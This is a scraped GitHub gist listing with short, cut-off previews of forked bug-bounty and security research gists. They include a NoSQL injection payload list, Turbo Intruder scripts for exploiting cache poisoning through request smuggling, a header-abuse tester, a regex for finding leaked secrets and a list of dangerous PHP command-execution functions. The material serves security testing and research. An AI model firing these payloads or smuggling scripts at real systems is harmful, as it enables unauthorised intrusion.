This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
srand2
/ Sysmon_Lab.ps1
Created
March 15, 2023 16:06
— forked from Purp1eW0lf/Sysmon_Lab.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Meta | |
| Date: 2022 March 28th | |
| Authors: Dray Agha (Twitter @purp1ew0lf) | |
| Company: Huntress Labs | |
| Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab. | |
| #> | |
| function admin_check{ | |
| if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(` |
srand2
/ nosql-injection-payloads-for-postman.json
Created
March 13, 2023 08:53
— forked from DanaEpp/nosql-injection-payloads-for-postman.json
NoSQL injection payloads for Postman
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| {"payload":"'"}, | |
| {"payload":"''"}, | |
| {"payload":";%00"}, | |
| {"payload":"--"}, | |
| {"payload":"-- -"}, | |
| {"payload":"\"\""}, | |
| {"payload":";"}, | |
| {"payload":"' OR '1"}, | |
| {"payload":"' OR 1 -- -"}, |
srand2
/ bbprograms.txt
Created
January 16, 2023 08:31
— forked from arbazkiraak/bbprograms.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| google dork -> site:.co.uk inurl:"responsible disclosure" | |
| https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
| http://www.123contactform.com/security-acknowledgements.htm | |
| https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
| https://support.1password.com/security-assessments/ | |
| https://www.23andme.com/security-report/ | |
| https://www.abnamro.com/en/footer/responsible-disclosure.html | |
| https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
| https://www.accredible.com/white_hat/ | |
| https://www.acquia.com/how-report-security-issue |
srand2
/ customcsrf.py
Created
January 5, 2023 15:36
— forked from fransr/customcsrf.py
Hackvertor Custom CSRF tag
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httplib | |
| import urllib | |
| http = httplib.HTTPSConnection('example.com', 443) | |
| cookie = 'your=cookies'; | |
| http.request("GET", "/api/v1/csrf", "", { | |
| 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36', | |
| 'referer': 'https://example.com/', |
srand2
/ Generic keys
Created
January 1, 2023 09:20
— forked from h4x0r-dz/Generic keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
srand2
/ hbh-header-abuse-test.py
Created
December 28, 2022 04:30
— forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # github.com/ndavison | |
| import requests | |
| import random | |
| import string | |
| from argparse import ArgumentParser | |
| parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.") | |
| parser.add_argument("-u", "--url", help="URL to target (without query string)") |
srand2
/ turbointruder-cachepoisoning.py
Created
December 11, 2022 08:12
— forked from DanielIntruder/turbointruder-cachepoisoning.py
A script to exploit cache poisoning using CL.CL request smuggling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
| def queueRequests(target, wordlists): | |
| # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
| engine = RequestEngine(endpoint=target.endpoint, | |
| concurrentConnections=5, | |
| requestsPerConnection=1, # if you increase this from 1, you may get false positives | |
| resumeSSL=False, | |
| timeout=10, | |
| pipeline=False, |
srand2
/ turbointruder-404.py
Created
December 11, 2022 08:12
— forked from DanielIntruder/turbointruder-404.py
A Turbo Intruder script for confirming CL.CL request smuggling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
| def queueRequests(target, wordlists): | |
| # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
| engine = RequestEngine(endpoint=target.endpoint, | |
| concurrentConnections=5, | |
| requestsPerConnection=1, # if you increase this from 1, you may get false positives | |
| resumeSSL=False, | |
| timeout=10, | |
| pipeline=False, |
srand2
/ phpdangerousfuncs.md
Created
October 30, 2022 18:04
— forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program